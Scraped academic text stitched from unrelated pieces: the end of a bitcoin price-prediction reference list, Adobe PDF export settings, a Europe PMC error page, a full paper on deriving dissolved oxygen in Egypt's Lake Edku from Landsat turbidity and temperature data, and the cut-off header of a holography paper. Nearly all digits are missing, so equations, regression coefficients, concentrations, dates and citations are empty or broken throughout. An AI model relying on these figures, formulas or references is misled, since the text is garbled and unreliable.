proceedings of kdd data science in fintech workshop (dsf). new york: acm, – . ji s, kim j, im h. . a comparative study of bitcoin price prediction using deep learning. mathematics ( ): – doi . /math . kingma dp, adam jb. . a method for stochastic optimization. in: rd international conference for learning representations iclr, san diego, ca. kirkpatrick cd, dahlquist jr. . technical analysis: the complete resource for financial market technicians. second edition. upper saddle river: financial times press. kuhn m, johnson k. . applied predictive modeling. new york: springer-verlag. lahmiri s, bekiros s. . cryptocurrency forecasting with deep learning chaotic neural networks. chaos, solitons & fractals (c): – doi . /j.chaos. . . . lamothe-fernández p, alaminos d, lamothe-lópez p, fernández-gámez m. . deep learning methods for modeling bitcoin price. mathematics ( ): . livieris i, pintelas e, stavroyiannis s, pintelas p. . ensemble deep learning models for forecasting cryptocurrency time-series. algorithms ( ): . mallqui da, fernandes ras. . predicting the direction, maximum, minimum and closing prices of daily bitcoin exchange rate using machine learning techniques. applied soft computing ( ): – doi . /j.asoc. . . . mcnally s, roche j, caton s. . predicting the price of bitcoin using machine learning. in: th euromicro international conference on parallel, distributed, and network-based processing, – march . cambridge, united kingdom. mudassir m, bennbaia s, unal d, hammoudeh m. . time-series forecasting of bitcoin prices using high-dimensional features: a machine learning approach. neural computing & applications – doi . /s - - - . munim z, shakil m, alon i. . next-day bitcoin price forecast. journal of risk and financial management ( ): – . pant dr, neupane p, poudel a, pokhrel ak, lama bk. . recurrent neural network based bitcoin price prediction by twitter sentiment analysis. in: ieee rd international conference on computing, communication and security (icccs), kathmandu (nepal). patel j, shah s, thakkar p, kotecha k. . predicting stock market index using fusion of machine learning techniques. expert systems with applications ( ): – doi . /j.eswa. . . . phaladisailoed t, numnonda t. . machine learning models comparison for bitcoin price prediction. in: th international conference on information technology and electrical engineering (icitee), – july . indonesia. rodriguez jd, perez a, lozano ja. . sensitivity analysis of k-fold cross validation in prediction error estimation. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . roy s, nanjiba s, chakrabarty a. . bitcoin price forecasting using time series analysis. in: st international conference of computer and information technology (iccit), – december , united international university, bangladesh. shintate t, pichl l. . trend prediction classification for high frequency bitcoin time series with deep learning. journal risk financial management ( ): . cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /access. . http://dx.doi.org/ . /math http://dx.doi.org/ . /j.chaos. . . http://dx.doi.org/ . /j.asoc. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ uras n, marchesi l, marchesi m, tonelli r. . forecasting bitcoin closing price series using linear regression and neural networks models. peerj computer science ( ):e doi . /peerj-cs. . velankar s, valecha s, maji s. . bitcoin price prediction using machine learning. in: international conference on advanced communications technology (icact), – february , chuncheon, south korea. cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ predictions of bitcoin prices through machine learning based frameworks introduction related work proposed frameworks frameworks’ calibration and performance metric results conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice wp-p m- .ebi.ac.uk params is empty sys_ exception wp-p m- .ebi.ac.uk no params is empty exception params is empty / / - : : if (typeof jquery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/ . . /js/jig.min.js"][/script]'.replace(/\[/g,string.fromcharcode( )).replace(/\]/g,string.fromcharcode( ))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} page not available reason: the web page address (url) that you used may be incorrect. message id: (wp-p m- .ebi.ac.uk) time: / / : : if you need further help, please send an email to pmc. include the information from the box above in your message. otherwise, click on one of the following links to continue using pmc: search the complete pmc archive. browse the contents of a specific journal in pmc. find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/med/ doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , assessment of a non-optical water quality property using space-based imagery in egyptian coastal lake hala o. abayazid and ahmed el-adawy coastal research institute national water research center ministry of water resources and irrigation hala osman moukhtar abayazid: e-mail: halazid@yahoo.com address: al-essawy street, sidi beshr alexandria-egypt abstract—progressive anthropogenic intrusion and increasing water demand necessitate frequent water quality monitoring for sustainability management. unlike laborious, time consuming field-based measurements, remote sensing-based water quality retrieval proved promising to overcome difficulties with temporal and spatial coverage. however, remotely estimated water quality parameters are mostly related to visibility characteristic and optically active property of water. this study presents results of an investigated approach to derive oxygen –related water quality parameter, namely dissolved oxygen (do), in a shallow inland water body from satellite imagery. the approach deduces do levels based on interrelated optical properties that dictate oxygen consumption and release in waters. comparative analysis of multiple regression algorithms was carried out, using various combinations of parameters; namely, turbidity, total suspended solids (tss), chlorophyll-a, and temperature. to cover the wide range of conditions that is experienced by edku coastal lake, ground truth measurements covering the four seasons were used with corresponding satellite imageries. while results show successful statistically significant correlation in certain combinations considered, yet optimal results were concluded with turbidity and natural logarithm of temperature. the algorithm model was developed with summer and fall data (r . ), then validated with winter and spring data (r . ). retrieved do concentrations highlighted the variability in pollution degree and zonation nature within that coastal lake, as related to boundary interactions and irregularity in flow dynamics within. the approach presented in this study encourages expanded applications with space-based earth observation products for exploring non-detectable water quality parameters that are interlinked with optically active properties in water. keywords-remote sensing; algorithm model; coastal lake; dissolved oxygen i. introduction increasing demands and progressive development process have compromised sustainability potential of the coastal lakes in egypt. the quality of water resources dictates beneficial uses offered as well as functionality of the aquatic ecosystem, especially with the alarming pollution level associated with the anthropogenic activities. thus, continuous monitoring and frequent update of water resources status are required for sound management planning and corrective measure scenarios. however, such tasks require comprehensive data collection with adequate temporal and spatial coverage. remote sensing is an advancing field that has the potential in reducing field work difficulties, and increasingly considered an essential planning tool. a. remote sensing-based water quality retrieval several studies in literature have addressed retrieval of water quality parameters using remote sensing techniques. significant correlations have been found between specific water quality parameters and reflectance measured with satellite sensors. these parameters cause change to the spectral properties of reflected light and, hence, are remotely detectable (gholizadeh et al., ). recent research by swain and sahoo ( ) argued that certain conservative pollutants can be distinctively detected with different reflectance received in the electromagnetic spectrum because no biochemical reactions or ionic exchange are experienced. retrieving properties such as water clarity; turbidity, and total suspended solids (tss) concentrations mailto:halazid@yahoo.com international journal of advanced network, monitoring and controls volume , no. , using earth observation imageries have been tackled in applied research studies worldwide (kloiber et al. ; zhang, ; bilge et al., ; he et al., ; sravanthi et al., ; dona et al., ; dorji and fearns ; abayazid and el-gamal ). in , he et al. presented water quality retrieval models with proven successful results for optical nitrogenous and phosphorous components. other parameters such as chlorophyll-a (chl-a) and colored dissolved organic matter (cdom)) have also been covered in various studies (i.e. brezonik et al., ; thiemann and kaufmann, ; li et al., ; dona et al., ). remotely deriving weak and/or non- optical water quality characteristics, that have no directly-detectable reflection, is challenging. consequently, early studies are mostly focused on water physical and biogeochemical components that are considered optically active (giardino et al., ). however, limitation to water quality characteristics that are related to inherent optical property (iop) narrows down the parameters that can be assessed by remote sensing techniques. the dissolved oxygen (do) concentration is considered a crucial indicator of water system healthiness, and governs recovery capability (unesco, ). yet, being a non-optically active parameter, do levels cannot be directly retrieved using remote sensing technique. this research study aims to present an approach to detect dissolved oxygen concentrations in an inland shallow coastal lake, using space-based imageries. based on grounds of early do modeling theories, as well as regional conditions, the study investigates the potentiality of deducing do levels from optically detectable water quality parameters that affect, and be affected by, oxygen presences in water. b. study area with growing population and development activities, the nile delta of egypt experience challenging conditions. lake edku is located within the active northwestern coastal zone of the delta, between longitudes ° ' & ° 'e and latitudes ° ' & ° 'n (fig. ). the lake is characterized of having systematically shrinking free open water, altered ecosystem and deteriorating water quality state (abayazid, ). edku lake serves an active agri- urban basin, and bordered by dense aquaculture practices. accordingly, the lake receives wastewaters with different pollution degree from fish farming therapeutic drugs, nutrient flux from agricultural drainage network (e.g. edku, el-boussili, khairy and bearsik drains), in addition to effluents from municipal wastewater treatment plants (wwtps) and industrial facilities (siam and ghobrial, ). the lake is connected to the mediterranean sea with single opening “boghaz al-maadia”, which allows temporal tidal inflows and localized saline water interaction. discharges with heavy nutrient levels, as well as the deceased salinity inputs, have encouraged excessive unwanted aquatic vegetation. that, in turn, disturbed natural circulation; flow dynamic and sediment transport, and hence self –purification within the lake (hossen and negm, ). ii. materials and methods this section addresses the basis of do modeling that dictated selection process to the parameters included in this study application. also, the ground truth data and corresponding satellite imageries considered are presented, and then followed by the approach adopted for algorithm development. a. theory: grounds for do modeling modeling of dissolved oxygen in water bodies has been initiated in by streeter and phelps through an application in the ohio river of the united states of america (chapra, ). simulation studies were based on the fact that the rate at which do fluctuates in waters reflect the rate of oxygen demand and release. their modified model set foundation of do sinks and sources through inclusion of factors proved affecting the dissolved oxygen depletion and recovery in a water body. beside the initially considered coefficients that represent reaeration as well as settling/ decay processes, the model extension added representative components of aquatic flora role in the oxygen production and exhaustion with photosynthetic activity. furthermore, sediment consumption of do has been added as an effective factor to be employed in the modified model for do prediction. equations and state the early model and modefied version; respectively. more details can be found in the text book of chapra ( ) international journal of advanced network, monitoring and controls volume , no. , figure . edku lake dt = do exp                tkexptkexp kk lk tk ac ca od a ( ) where; dt is the predicted dissolved oxygen deficit concentration, t is the travel time, l is the bod level at point of interest, lo is the ultimate bod level, ka is the reaeration rate, kd is the decomposition rate, ks is the settling removal rate, kc is the cbod decay coefficient, and do is the initial value of the oxygen deficit.           tk o a tk b a tk a tk na kttk on ca tktk oc t a a aaanac ed k es k er k ep kk eenk kk eelk d                 ( ) international journal of advanced network, monitoring and controls volume , no. , the modified model has added factors as; p the photosynthetic oxygen production rate, r the algal respiration rate, sb the sediment oxygen demand rate, no the initial nitrogenous bod (nbod), and kn the nbod decay coefficient. b. field measurements ground truth data used were obtained from published research study by okbah et al. ( ). authors presented data collected in ten sampling locations distributed throughout the edku lake. spatial distribution of field measurement locations reflects variability in the lake water quality, with regard to boundary interaction as well as flow movements within the lake (fig. ). further, sampling campaigns have been carried out during four seasons; spring, summer, fall and winter of year , which reflected the variable conditions that the coastal lake experince. statistics of the field measurements show that in summer time do levels reach the lowest concentrations, ranging from . to . mg/l, and experience wide variability within the lake with standard deviation of among the ten investigated locations. meanwhile, the highest do levels occur in winter, ranging from . to . mg/l, with standard deviation of . . the lake water do range from . to . mg/l in spring, whereas the fall season has slightly less concentrations, ranging from . to . mg/l. maximum measured do concentrations were mostly found in zones "c" and "d", as illustrated in figure ( ). on the other hand, minimum levels occur in locations within the eastern zone "a", where most of direct wastewater discharges reach the lake water, especially in summer season. field sampling location figure . field measurement locations in lake edku zones a, b, c, and d zone a zone b zone c zone d spring summer fall winter d o ( m g /l ) figure . observed do data during four seasons in lake edku zones international journal of advanced network, monitoring and controls volume , no. , c. remote sensing data in , ganoe and deyoung presented theoretical basis for do retrieval with the use of air-borne raman spectroscopy instead of ship-based technology that customary required direct contact with the waterbody. authors argued the advantages of air-based technique in measuring do when compared to time consuming as well as limitation in detecting variability in changing water conditions during field trips. the research concluded promising success of remote sensing retrieval of the temporal and spatial dynamics of dissolved gas distributions in coastal ecosystems. yet aerial arrangements are costly and not always readily available, while space-borne sensors can have more frequent revisits and reasonably spatial coverage with advancing spectral resolution. the imageries used in this study are the freely available landsat operational land imager (oli) from the unitd states geological survey (usgs) earth- explorer website. the landsat (oli/tirs) is the most recent satellite that was launched in under the landsat program, with swath width of km and days’ revisit interval. since the in situ do data have been collected during spring, summer, fall and winter of year , images used in this study were acquired on nearest corresponding overpass dates to match the sampling data timing table ( ). table ( ) states the spectral range considered in this study, covering visible and near-infrared as well as thermal infrared bands. the necessary image processing and result analysis were carries out in geographic information system (gis) environment. table i. used landsat (oli) scenes and dates of acquisition scene id (path /row ) date acquired "lc lgn " -mar- "lc lgn " -may- "lc lgn " -aug- "lc lgn " -dec- table ii. landsat (oli) spectral bands considered in this study landsat (oli) bands spectral range (μm) band (visible) . - . band (visible) . - . band (visible) . - . band (near-infrared) . - . thermal infrared sensor (tirs) thermal infrared (band ) . - . thermal infrared (band ) . - . d. algorithm development satellite imageries were processed for carrying out multiple regression technique and reaching best algoritm model for do retrival in lake edku. analysis have been performed with the spatially distributed field measurements of dissolved oxygen as related to the spectral reflectance values derived from landsat images at corresponding dates in year . the available field data were divided into two groups for building algorithm models. then performance has been tested with the reserved second group of data for validation process. based on the previously mentioned grounds of streeter and phelps do modeling, as well as regional conditions defining water quality in coastal lakes of egypt, the trophic and sediment-related properties were international journal of advanced network, monitoring and controls volume , no. , considered key factors in selection. primary, the parameters included for developing do derivative algorithms were turbidity, total suspended sediments (tss), and chlorophyll-a. also, temperature was added in the do retrieval process as an important driver affecting oxygen level in water, especially with the thermal anthropogenic releases and flow dynamic irregularity within lake edku. cutomarily, do concentration in water is inversely related to the temperature. therefore, zonation of thermal property is expceted to have direct reflection on do retrieved distribution. in process, alternate combinations of the considered parameters have been investigated for optimal model results. turbidity and tss levels were deduced using findings of the recent research study of abayazid and el-gamal ( ). authors concluded regional algorithm models for remotely sensed turbidity and tss in the nile delta coastal zone, in terms of landsat 's reflectance from spectral bands; band ref, band ref and band ref, as presented in equations and , respectively. ln turbidity = - . + [ . band ref] + [ . ln (band ref/band ref] ( ) ln tss = . [ . + . band ref] . ( ) while literature applications showed various retrieval algorithms for chlorophyll-a (e.g. dona et al., ; akbar et al., ; brivio et al., ), best agreeable results for quantifying chlorophyll-a in lake edku were found with the ratio between reflectance from spectral bands and of landsat (eq. ). chlorophyll-a = band ref/ band ref ( ) thermal spectral data have been converted to temperature "t", using the conversion formula presented in equation (usgs, ) ( ) where lλ is the spectral radiance, and k and k are the thermal conversion constants found in landsat imagery metadata files. surface water temperature levels are calculated using averaged values of thermal infrared bands ( ) and ( ). sensitivity analysis was performed to select best combination of the considered parameters, with different seasonal conditions experinced in the lake. accordingly, the optimal do retrieval algorithm model with best fitting predictions, as well as least data requirement and calculation efforts, has been selected for result demonstration. iii. results many factors control the do concentration within a waterbody; both sources and sinks (e.g. consumption by flora and aerobic organisms, oxidation of carbonaceous and nitrogenous material, decomposition of organic material, photosynthetic activity, degrading inorganic chemicals, re-aeration possibility as well as temperature, and dynamics in flow. drainage water inflowing into lake edku from the interconnected stream networks reflect the expanding urban activities and industrial facilities, beside the intensive agricultural processes. in addition, the aquacultural practices add an extra polluting source. a. remotely sensed input parameters the four parameters initially considered as inputs for do modeling have been spatially derived for spring, summer, fall and winter seasons of year , with corresponding landsat imageries. example illustrations are found in figures , , and for temperature, turbidity, tss and chlorophyll-a levels within lake edku, respectively. 𝑇 = 𝐾 𝐿𝑛 ( 𝐾 𝐿λ + ) international journal of advanced network, monitoring and controls volume , no. , figure . spatial distribution of derived temperature (ºc) within lake edku in spring, . . figure . spatial distribution of derived turbidity (ntu) within lake edku in spring, . . figure . spatial distribution of derived tss (mg/l) within lake edku in spring, international journal of advanced network, monitoring and controls volume , no. , . . figure . spatial distribution of derived chlorophyll-a (mg/m ) within lake edku in spring, b. sensitivity analysis for developing satellite-based dissolved oxygen retrieval model, analysis has been carried out with various combinations of input parameters versus do field measurements. the selected ground truth data is distributed throughout the lake zones. furthermore, the data covers the four seasons so that a wide range of water quality levels experienced in the lake is considered in the developed model. table ( ) presents model predictive capacity and goodness of fitting while considering selective inputs as well as seasonal variations of do presence in the lake waters. sensitivity analysis showed that tss and turbidity have similar effect in detecting oxygen consumption in the waterbody under consideration. it was also found that the least influential factor is the chlorophyll-a. minor change with least effect in predictive capacity of the developed algorithm occurs when adding chlorophyll-a to the input parameters. table iii. sensitivity analysis for optimal do retrieval algorithm model seasons input parameters regression coefficient (r ) spring & fall & winter turb, tss, chl, ln-temp . summer & fall & winter turb, tss, chl, ln-temp . spring & summer & fall turb, tss, chl, ln-temp . summer & fall turb, tss, chl, ln-temp . spring & fall turb, tss, chl, ln-temp . spring & winter turb, tss, chl, ln-temp . spring & summer & fall turb, tss, ln-temp . summer & fall & winter turb, tss, ln-temp . spring & fall & winter turb, tss, ln-temp . spring & fall turb, tss, chl . spring & fall tss, chl, ln-temp . spring & winter tss, chl, ln-temp . summer & fall turb, tss, ln-temp . summer & fall turb, chl, ln-temp . summer & fall tss, ln-temp . summer & fall turb, ln-temp . international journal of advanced network, monitoring and controls volume , no. , c. developed algorithm model for do retrieval optimal derivative capacity for do levels in lake edku, with least input parameter requirements, hence less processing works and costs, was found by using only turbidity and natural logarithm of temperature. the developed algorithm model, stated in equation , proved reasonable fitness with regression coefficient of . (fig. ). do= . + . turbidity– . ln (temperature) ( ) the proposed algorithm was then applied to the second group of data reserved for testing, and satellite- based derived do concentrations were compared with the corresponding field measurements. validation results proved acceptable predictive capacity of the developed algorithm model, with r of . (fig. ). descriptive statistics for observed versus modeled yearly average do levels within lake edku are presented in table ( ). the developed model shows highly agreeable predictions with field measurements. however, the model failed to represent the very low do concentration occurrence in the lake during summer season. r² = . observed dissolved oxygen (mg/l) p re d ic te d d is s o lv e d o x y g e n ( m g /l ) figure . predictive capacity of developed algorithm model for do satellite-based retrieval r² = . observed dissolved oxygen (mg/l) p re d ic te d d is s o lv e d o x y g e n ( m g /l ) figure . validation of the developed model for do retrieval once validated, the developed model has been applied to a set of landsat imageris to obtain retrieved do spatial distribution in lake edku in time steps. figure illustrates comparison for observed versus derived do concentrations during four seasons in lake edku. for the purpose of demonstration, figure ( ) shows an example mapping of do concentrations throughout the lake zones in winter time. international journal of advanced network, monitoring and controls volume , no. , table iv. descriptive statistics for observed versus derived yearly do levels within lake edku descriptive statistics do (mg/l) observed modeled mean . . minimum . . maximum . . standard deviation . . spring summer fall winter observed derived d o ( m g /l ) figure . observed versus derived do concentrations during four seasons in lake edku figure . retrieved do concentrations in lake edku during winter season international journal of advanced network, monitoring and controls volume , no. , iv. discussion main feature characterizes the edku lake system is the patchy pattern of water quality. dissolved oxygen level ranges from less than mg/l, in extremely poor water conditions, to concentrations over mg/l. however, the exceedingly high do level, with regional temperatures range of – ᵒc in coastal lakes, is considered - % supersaturation and potentially signifies an unhealthy eutrophication condition (epa, ). in investigating do concentrations with reference to location within the lake, this case is clearly demonstrated in zone d of lake edku. it has been noted that there are very high do levels, detected both in field measurements as well as derived do concentrations, in zone d which comprise entrapped waters with rare interaction. in reviewing this condition, it was found that the area experience intensive unwarranted aquatic flora growth, and accordingly high rate of the photosynthetic oxygen production, that coincides with less active hydrodynamics and water exchange. on the other hand, zone a, that is the nearest to major drainage inputs into the lake, has healthier do concentrations. this zone, while loaded with excessive pollutants, experiences inflowing water velocity along with shallow water depth that allows partial compensation with higher re-aeration rate. moderate range of do concentrations exists mostly in zone b, and zone c, with combined effect of low temperature and suspended sediment concentrations as well as slower flow dynamics in zone b and localized tidal effect in zone c. v. conclusions developments and consequent concerns about water resources beneficial capacity require continuous monitoring. field-based assessment of quality state is usually faced by limitations in spatial coverage, frequency of sampling as well as possible economic and accessibility obstcles. meanwhile, applications with remote sensing techniques have proved successful retrival of water quality parameters, yet for optically active ones that have directly-detectable spectral signals. this research study presents an approach for deriving a non-optically active property of water quality, dissolved oxygen (do), with reference to other space-based retrievable parameters that affect and be affected by do concentrations. derivation methodology is based on the grounds of do modeling, as well as regional conditions that define water quality in coastal lakes of egypt. the selected ground truth data is distributed throughout the lake zones. furthermore, the data covers the four seasons so that a wide range of water quality levels experienced in the lake is reflected in the developed model. the study also presents results of sensitivity analysis for alternate input combinations. consequently, optimal do derivative algorithm model, with best predictive capacity and least data requirement, was found. the developed optimal model comprises two satellite-based inputs, namely turbidity and temperature, for the edku coastal lake. with the acceptable predictive capacity achieved, the validated model facilitates regular assessment, with more frequent do mapping, and possible following of historical changes. spatial distribution of do concentrations reflects the patchy pattern within lake edku, with regard to interactions in boundary as well as irregular flow dynamics within. the detected zonation nature calls for specific remedial measures that vary for each section. finally, remote sensing techniques proved having the potential to play more roles in monitoring processes, and offering valuable information for sustainability management. the approach illustrated in this study sheds the light at the opportunity to expand applications with space-based earth observation products. the achieved promising results open the field for exploring more non-detectable water quality parameters that are interlinked with optically active properties in water. however further applications with finer imageries and intensive ground truth data are recommended for relationship with higher accuracy. references [ ] abayazid, h., . assessment of temporal and spatial alteration in coastal lakes-egypt. in: proceedings of the eighteenth international water technology conference (iwtc ), sharm el sheikh, – mar , – . [ ] abayazid, h., el-gamal, a., . employing remote sensing for water clarity monitoring in the nile delta coast. international water technology journal iwtj ( ), - . [ ] akbar, t., hassan, q., achari, g., . a remote sensing based framework for predicting water quality of different source waters. international archives of the photogrammetry, remote sensing and spatial information sciences , part xxx. [ ] bilge, f., yazici, b., dogeroglu, t., ayday, c., . statistical evaluation of remotely sensed data for water quality monitoring. international journal of remote sensing ( ), – . [ ] brezonik, p., menken, k.d., bauer, m., . landsat-based remote sensing of lake water quality characteristics, including chlorophyll and colored dissolved organic matter (cdom). lake reserv. manag. , – . international journal of advanced network, monitoring and controls volume , no. , [ ] brivio, p., giardino, c., zilioli, e., . determination of chlorophyll concentration changes in lake garda using an image- based reductive transfer code for landsat tm images. international journal of remote sensing ( ), - . [ ] chapra, s.c., . surface water quality modeling. mcgraw-hill co. inc. [ ] dona, c., sánchez, j.m., caselles, v., domínguez, j.a., camacho, a., . empirical relationships for monitoring water quality of lakes and reservoirs through multispectral images. ieee journal of selected topics in applied earth observations and remote sensing ( ), - . [ ] dorji, p., fearns, p., . a quantitative comparison of total suspended sediment algorithms: a case study of the last decade for modis and landsat-based sensors. remote sens. , ; doi: . /rs . [ ] environmental protection agency (epa), . guidance manual for compliance with the interim enhanced surface water treatment rule. united states, environmental protection agency, office of water ( ) publishing, epa- - r- - , p. [ ] ganoe, r., deyoung, r., . remote sensing of dissolved oxygen and nitrogen in water using raman spectroscopy. the nasa scientific and technical information (sti), nasa center for aerospace information, nasa/tm– - . [ ] gholizadeh, m.h., melesse, a.m., reddi, l., . a comprehensive review on water quality parameters estimation using remote sensing techniques. sensors ( ), ; doi: . /s . [ ] giardino, c., bresciani, m., stroppiana, d., oggioni, a., morabito, g., . optical remote sensing of lakes: an overview on lake maggiore. j. limnol. (s ), - ; doi: . /jlimnol. . . [ ] he, w., chen, s., liu, x., chen, j., . water quality monitoring in slightly-polluted inland water body through remote sensing - a case study in guanting reservoir, beijing, china. front. environ. sci. engin. china ( ), – ; doi . /s - - - . [ ] hossen, h., negm, a., . sustainability of water bodies of edku lake, northwest of nile delta, egypt: rs/gis approach. procedia engineering , – . [ ] kloiber, s.m., brezonik, p.l., bauer, m.e, . application of landsat imagery to regional-scale assessments of lake clarity. water res. ( , – . [ ] li, s., wu, q., wang, x., . correlations between reflectance spectra and contents of chlorophyll-a in chaohu lake. journal of lake sciences ( ), - . [ ] okbah, m., abd el-halim, a., abu el-regal, m., nassar, m., . water quality assessment of lake edku using physicochemical and nutrients salts, egypt. chemistry reseach journal ( ), - . [ ] siam, e., ghobrial, m., . pollution influence on bacterial abundance and chlorophyll-a concentration: case study at idku lagoon, egypt. scientia marina sci. mar. ( ), - . [ ] sravanthi, n., ramana, i.v., yunusali, p., ashraf, m., ali, m.m., narayana, a.c., . an algorithm for estimating suspended sediment concentrations in the coastal waters of india using remotely sensed reflectance and its application to coastal environments. int. j. environ. res., ( ), - . [ ] swain, r., sahoo, b., . improving river water quality monitoring using satellite data products and a genetic algorithm processing approach. sustainability of water quality and ecology ( – ), – . [ ] thiemann, s., kaufmann, h., . determination of chlorophyll content and trophic state of lakes using field spectrometer and irs- c satellite data in the mecklenburg lake district - germany. remote sensing of environment , - . [ ] united nations educational, scientific and cultural organization (unesco), . water resources systems planning and management - isbn - - - – © unesco, – . [ ] united states geological survey (usgs), earth resources observation and science (eros) center, . landsat (l ) data users’ handbook, version . , lsds- . [ ] zhang, y.z., . application of an empirical neural network to surface water quality estimation in the gulf of finland using combined optical data and microwave data. remote sensing of environment ( ), – . 正文模板 international conference on sensor network and computer engineering (icsnce ) research on digital holographic d reconstruction software ma jing school of computer science and engineering xi’an technological university xi’an, , shaanxi, china e-mail: majing_majing@qq.com fu yanfang, tian penghui school of computer science and engineering xi’an technological university xi’an, , shaanxi, china abstract—digital holography has 